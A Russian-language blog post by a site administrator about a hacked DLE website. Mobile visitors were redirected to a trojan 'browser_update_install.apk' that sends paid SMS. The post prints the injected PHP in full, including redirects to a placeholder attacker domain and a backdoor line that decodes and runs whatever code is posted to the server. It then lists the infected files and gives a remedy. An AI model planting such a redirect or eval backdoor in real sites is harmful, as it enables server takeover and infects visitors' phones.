browser_update_install.apk в DLE

8 Март, 2013   //   Опубликовал: admin   //   Блог  //  Один комментарий

Недавно решил зайти на один из клиентских сайтов через андроид девайс и вместо открытия сайта, мне было предложено скачать файл browser_update_install.apk. Конечно качать я ничего не начал, просто закрыл предложенное мне окошко! Я сразу понял, что это троянец, раньше с такими дело имел. После установки предлагаемого приложения с девайса начинают отсылаться платные смс, пока не счету не кончатся деньги.

Внимание! Не устанавливайте browser_update_install.apk!!!

Значит я сразу полез искать его в файл .htaccess, обычно код прописывался там. Однако на этот раз там его не было, полез искать дальше…

Вот какой PHP-код я нашел у себя:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://вражеский_домен/');
}
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://вражеский_домен/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://вражеский_домен/');
}

Этот код находился в этих файлах:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Затем узнал, что в начале этого года на множество сайтов с CMS DLE была проведена SQL инъекция.

Решение данной проблемы: удалить код, применить патч

Один комментарий

Оставить комментарий